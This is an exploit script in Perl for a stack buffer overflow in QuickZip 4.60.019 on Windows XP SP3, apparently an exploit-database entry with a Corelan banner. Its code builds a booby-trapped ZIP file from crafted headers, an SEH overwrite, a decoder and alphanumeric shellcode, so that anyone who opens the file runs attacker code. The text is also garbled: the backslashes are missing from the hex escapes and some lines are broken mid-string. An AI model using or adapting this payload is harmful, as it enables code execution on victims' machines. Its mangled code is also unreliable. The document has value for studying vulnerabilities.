Text :  

# Exploit Title : QuickZip 4.60.019 Stack BOF - XP SP3
# OSVDB-ID : 62781
# Date : March 2nd 2010
# Author : corelanc0d3r
# Bug found by : corelanc0d3r
# Software Link : http://www.quickzip.org/downloads.html
# Version : 4.60.019
# OS : Windows
# Tested on : XP SP3 En (VirtualBox) - offset is 297.
# You may have to change this to 294
# Type of vuln : SEH, with ppr from OS dll
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
---------------------------------------------------------------------------
-------------------------
# Detailed write-up about this vulnerability and exploit
# can be found at
#
http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-a-box-of-
chocolates-part-2/
#
---------------------------------------------------------------------------
-------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may
cause.
#
#
# Code :
print
"|------------------------------------------------------------------|n
";
print "| __ __
|n";
print "| _________ ________ / /___ _____ / /____ ____ _____
___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __
`__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / /
/ / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/
/_/ |n";
print "|
|n";
print "|
http://www.corelan.be:8800 |n";
print "|
|n";
print "|-------------------------------------------------[ EIP Hunters
]--|nn";
print " --==[ Exploit for QuickZip 4.60.019 ]==-- nn";

my $sploitfile="corelansploit.zip";
my $ldf_header = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

print "[+] Preparing payloadn";

my $nseh="x41x41x41x41";
my $seh="x65x47x7ex6d";

my $payload = "B" x 297 . $nseh . $seh;
my $predecoder = "x59x59x59x51x5c";
my $decoder="x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".
"x2Dx55x55x55x5F".
"x2Dx55x55x55x5F".
"x2Dx56x55x56x5F".
"x50".
"x25x4Ax4Dx4Ex55".
"x25x35x32x31x2A".
"x2Dx2Ax6Ax31x55".
"x2Dx2Ax6Ax31x55".
"x2Dx2Bx5Ax30x55".
"x50".
"x73xf7";

$payload=$payload.$predecoder.$decoder;
my $filltoecx="B" x (100-length($predecoder.$decoder));

my $shellcode = "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BB".
"ABXP8ABuJIhYXkOkXYt4vDjT4qYBNRQjfQO93TLKRQ00nkSFDLLKT6uLN".
"kqV4HLKQnwPLKWF5hPOVxqeicryuQkayoKQU0lKplwTUtlKaUGLlKf4tE".
"CHvaHjNkpJDXLKCjUp6aJKhcgGG9LKp4nk5QxnvQkOP1iPIlNLmTO0RTU".
"ZjaZo4MUQO7M9Xqio9oKOGKcLQ4WXrUKnnkpZdds18kQvnkTLRknkpZUL".
"WqJKlKtDlKUQJHk91Tq4wl3QXCmbs819xTk9HemYkr58LNRntNjLRrKXO".
"lyoio9oNiBe34mkqnjxYr43LGwl7TBrJHLKyokOiomYCuUXQxrL0lupKO".
"QxVSebTnPdbH0uRSsU1bLHQLq4tJNim6RvIoRuWtNio2BpMkI8NBRmmlK".
"7uL7T1BKXQNKOyoYocXPstzQHq0cXWPQcsQRY1xFPRDp3rRcX0lQq0ncS".
"phrCrOCBpefQkknhqL4dwbNiIsSXrEu4PXUpqxepvP47rNQxPb2ErE2NU".
"8SQT6e5WPQxbOpu5psXQxE1CXgPPy0h1qrHCQcXPhrMpuSQphVQO9nh0L".
"6DuNK9HatqKbPR3cV1RrYoxPDqkprpKObuvhA";

my $rest = "C" x (4064-length($payload.$filltoecx.$shellcode)) .
".txt";
$payload = $payload.$filltoecx.$shellcode.$rest;

my $evilzip = $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header;

print "[+] Writing payload to filen";

open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file
$sploitfilen";

  References :  

None